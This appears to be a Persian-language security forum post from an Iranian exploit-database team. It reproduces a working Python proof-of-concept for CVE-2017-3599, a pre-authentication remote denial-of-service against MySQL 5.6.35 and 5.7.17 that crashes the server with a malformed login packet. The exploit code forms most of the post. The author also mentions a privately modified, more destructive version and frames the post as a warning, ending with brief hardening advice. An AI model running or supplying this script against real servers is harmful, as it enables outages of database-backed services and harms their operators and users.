با سلام و درود.
یکی دوروز هستش که اکسپلویت مربوط به Doc و اختلال در سرویس MySQL ورژن MySQL 5.6.35 And 5.7.17 منتشر شده است.
MySQL 5.6.35 And 5.7.17 Integer Overflow vulnerability
این اکسپلویت,با وارد کردن کاراکتری,باعث اختلال می شود.
تست کردیم و دیدیم تا حدودی تاثیر دارد.اما با تغییراتی که دادیم و کاملا خصوصی است,کاملا این سرویس را میتوان به اختلال کامل انداخت.

لینک اکسپلویت :

MySQL 5.6.35 And 5.7.17 Integer Overflow vulnerability

کد:
###########################

# MySQL 5.6.35 And 5.7.17 Integer Overflow vulnerability

###########################

'''
# Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py
# Exploit Title: Remote MySQL DOS (Integer Overflow)
# Google Dork: N/A
# Date: 13th April 2017
# Exploit Author: Rodrigo Marcos
# Vendor Homepage: https://www.mysql.com/
# Software Link: https://www.mysql.com/downloads/
# Version: 5.6.35 and below / 5.7.17 and below
# Tested on: N/A
# CVE : CVE-2017-3599
'''

import socket
import sys
from struct import pack

'''
CVE-2017-3599 Proof of Concept exploit code.

https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/

Rodrigo Marcos

'''

if len(sys.argv)<2:

print "Usage: python " + sys.argv[0] + " host [port]"
exit(0)

else:
HOST = sys.argv[1]

if len(sys.argv)>2:
PORT = int(sys.argv[2]) # Yes, no error checking... living on the wild side!
else:
PORT = 3306

print "[+] Creating packet..."

'''
3 bytes Packet lenth
1 bytes Packet number

Login request:

Packet format (when the server is 4.1 or newer):

Bytes Content
----- ----
4 client capabilities
4 max packet size
1 charset number
23 reserved (always 0)
n user name, \0-terminated
n plugin auth data (e.g. scramble), length encoded
n database name, \0-terminated
(if CLIENT_CONNECT_WITH_DB is set in the capabilities)
n client auth plugin name - \0-terminated string,
(if CLIENT_PLUGIN_AUTH is set in the capabilities)

'''

# packet_len = '\x64\x00\x00'

packet_num = '\x01'

#Login request packet
packet_cap = '\x85\xa2\xbf\x01' # client capabilities (default)
packet_max = '\x00\x00\x00\x01' # max packet size (default)
packet_cset = '\x21' # charset (default)
p_reserved = '\x00' * 23 # 23 bytes reserved with nulls (default)
packet_usr = 'test\x00' # username null terminated (default)

packet_auth = '\xff' # both \xff and \xfe crash the server

'''
Conditions to crash:

1 - packet_auth must start with \xff or \xfe
2 - packet_auth must be shorter than 8 chars

The expected value is the password, which could be of two different formats
(null terminated or length encoded) depending on the client functionality.
'''

packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth
packet_len = pack('i',len(packet))[:3]

request = packet_len + packet_num + packet

print "[+] Connecting to host..."
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print "[+] Connected."

except:
print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + "."
s.close()
print "[+] Exiting."
exit(0)

print "[+] Receiving greeting from remote host..."
data = s.recv(1024)
print "[+] Done."

print "[+] Sending our payload..."
s.send(request)
print "[+] Done."
#print "Our data: %r" % request

s.close()


###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-05-02]

###########################
این هم مثل مشکلات امنیتی دیگر در این سرویس است,اما بخاطر اینکه حتی کوچکترین مشکل هم پیش نیاد,حتی واسه یک نفر,این اکسپلویت رو قرار دادیم و این پست رو ایجاد کردیم.
در حقیقت همه ما میدونیم که پورتال هایی که با دیتابیس کار دارد,میتوان با یک تغییرات و یا ایجاد یک تیکه کد که بین سایت و دیتابیس هستش,کاملا اون سایت رو به اختلال انداخت و حتی از سرور به مشکل بخورد.نمونه موجود است.اما نمیخواهیم پابلیک کنیم.
این اکسپلویت ریموت است.
این اکسپلویت بر اساس اکسپلویت قدیمی در یک ماه پیش منتشر شده است کار میکند.
بعضی از امنیت کارها و مخصوصا آماتورها که فقط با سرچ,و کارهایی که توی گوگل و سایت های دیگه گفته,کانفیگ انجام میدن و اصلا آگاهی از این سرویس و حتی بلاک از سمت فایروال را بلد نیستن,باعث میشوند که خیلی از سایت ها به مشکل بخورند.حتی با همین تیکه کد ساده.(با احترام کامل به تک تک عزیزان)
پورت را میتوان بست و لوکال استفاده کرد
نکته : باگ لوکال هم برای این سرویس هستش.که بازم به کانفیگ سرور و این سرویس بر میگرده.
همچنین در کانفیگ میتوان تعداد ورودی های و کانکشن های کاربر را محدود کرد.بستگی به نوع سرور و خدمات بر میگردد.
MySQL ورژن 5.6 و 5.7 تند تند باگ و مشکل امنیتی از آنها به ثبت میرسد.
لطفا دوستانی که از این ورزن استفاده میکنند حتما به این سرویس هم رسیدگی کنند.دو سه راه را گفتم.
لطفا مواظب باشید و کارهای امنیتی رو به دقت انجام دهید و این سرویس در اولویت باشد.
موفق و سربلند باشید.

منبع : تیم هکری , تیم اکسپلویت , تیم امنیتی Iedb.Ir